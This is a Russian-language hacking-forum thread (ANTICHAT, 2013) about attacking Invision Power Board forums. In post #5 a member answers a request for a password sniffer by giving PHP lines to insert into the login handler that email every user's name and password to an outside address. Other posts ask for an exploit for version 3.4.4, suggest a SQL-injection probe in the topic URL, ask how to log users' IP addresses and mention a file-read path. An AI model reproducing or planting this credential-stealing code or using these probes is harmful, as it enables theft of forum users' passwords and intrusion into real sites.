HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.01.2013, 12:18
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами: 9561436

Репутация: 462
По умолчанию

Цитата:
Сообщение от BigBear  
Можно при условии, что Вас пускает в администраторскую панель с модераторскими правами.
К сожалению нет. В папке с админкой .htaccess и доступ только для определенных IP

Через аттачи не? Заливается но не выполняется. lfi нет
 
Ответить с цитированием

  #2  
Старый 09.02.2013, 23:18
korp
Новичок
Регистрация: 26.09.2008
Сообщений: 29
С нами: 9275143

Репутация: 11
По умолчанию

[QUOTE="-=lebed=-"]
[B][COLOR="Red"]Invision Power Board
 
Ответить с цитированием

  #3  
Старый 14.05.2013, 17:58
CoBecTb
Новичок
Регистрация: 12.08.2012
Сообщений: 16
С нами: 7237046

Репутация: 0
По умолчанию

Имею полный доступ к ipb 3.4.2, хочу поставить сниффер для отправки паролей на майл, или сохранения в файл, кому не сложно скиньте и объясните как установить и куда. Заранее благодарю.
 
Ответить с цитированием

  #4  
Старый 29.05.2013, 23:41
Unknowhacker
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами: 6825206

Репутация: 24
По умолчанию

Мужики, а есть эксплоит под версию 3.4.4

P.S Выдало ошибку PB Предупреждение [2] mysql_connect() [function.mysql-connect]: [2002] No connection could be made because the target machine actively refused it. (trying to connect via tcp://localhost:3306) (Строка: 141 файла \ips_kernel\class_db_mysql.php)

IPB Предупреждение [2] mysql_connect() [function.mysql-connect]: No connection could be made because the target machine actively refused it. (Строка: 141 файла \ips_kernel\class_db_mysql.php)
 
Ответить с цитированием

  #5  
Старый 25.06.2013, 12:06
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами: 8258006

Репутация: 25


По умолчанию

Цитата:
Сообщение от CoBecTb  
Имею полный доступ к ipb 3.4.2, хочу поставить сниффер для отправки паролей на майл, или сохранения в файл, кому не сложно скиньте и объясните как установить и куда. Заранее благодарю.
в файле /forum/sources/action_public/login.php или /forum/admin/sources/handlers/han_login.php не помню в какой версии какой путь. Сразу под строкой // Check auth вставляй следующее чтоб получилось так:

Код HTML:
$this->loginAuthenticate( $username, $email, $password );
$ipsclass_all = $username . ":" . $password;
mail('василийпупкин@gmail.com', '123', $ipsclass_all);
 
Ответить с цитированием

  #6  
Старый 28.07.2013, 17:39
Unknowhacker
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами: 6825206

Репутация: 24
По умолчанию

Короче на движке IPB, когда заходишь в любую тему, внизу выходит окно с ошибкой SQL:

P.S И собственно вопрос, можно как-нибудь пробить путь к таблицам
 
Ответить с цитированием

  #7  
Старый 28.07.2013, 18:42
Inoms
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами: 6783446

Репутация: 45
По умолчанию

Цитата:
Сообщение от Unknowhacker  
Короче на движке IPB, когда заходишь в любую тему, внизу выходит окно с ошибкой SQL:

P.S И собственно вопрос, можно как-нибудь пробить путь к таблицам
Если в урл, вместо ид топика поставь -1) -- - - что напишет ?
 
Ответить с цитированием

  #8  
Старый 29.07.2013, 21:24
Unknowhacker
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами: 6825206

Репутация: 24
По умолчанию

Цитата:
Сообщение от Inoms  
Если в урл, вместо ид топика поставь -1) -- - - что напишет ?
Сообщение форума

Обнаружена ошибка. Если вам неизвестны причины ошибки, попробуйте обратиться к разделам помощи.

Обнаружена ошибка:

Некоторые требуемые файлы отсутствуют. Если вы хотели просмотреть тему, возможно эта тема перемещена или удалена. Вернитесь назад и попробуйте снова.

P.S Т.е SQL ошибки нет.
 
Ответить с цитированием

  #9  
Старый 01.08.2013, 14:19
miosaki
Новичок
Регистрация: 05.01.2013
Сообщений: 4
С нами: 7026806

Репутация: 0
По умолчанию

Ребята как узнать айпи адресс человека на IPB форуме?

http://iplogger.ru/1fFc3.jpg

а чо за айпи логгер?
 
Ответить с цитированием

  #10  
Старый 02.08.2013, 19:39
zippy
Новичок
Регистрация: 31.07.2013
Сообщений: 1
С нами: 6728726

Репутация: 0
По умолчанию

Если на линейке 3.4.0 - 3.4.5 не стоит этот патч, то можно ли прочитать файлы форума через public/min/index.php?f=
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
[Обзор уязвимостей XMBForum] [x26]VOLAND Уязвимости CMS / форумов 0 19.05.2008 13:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.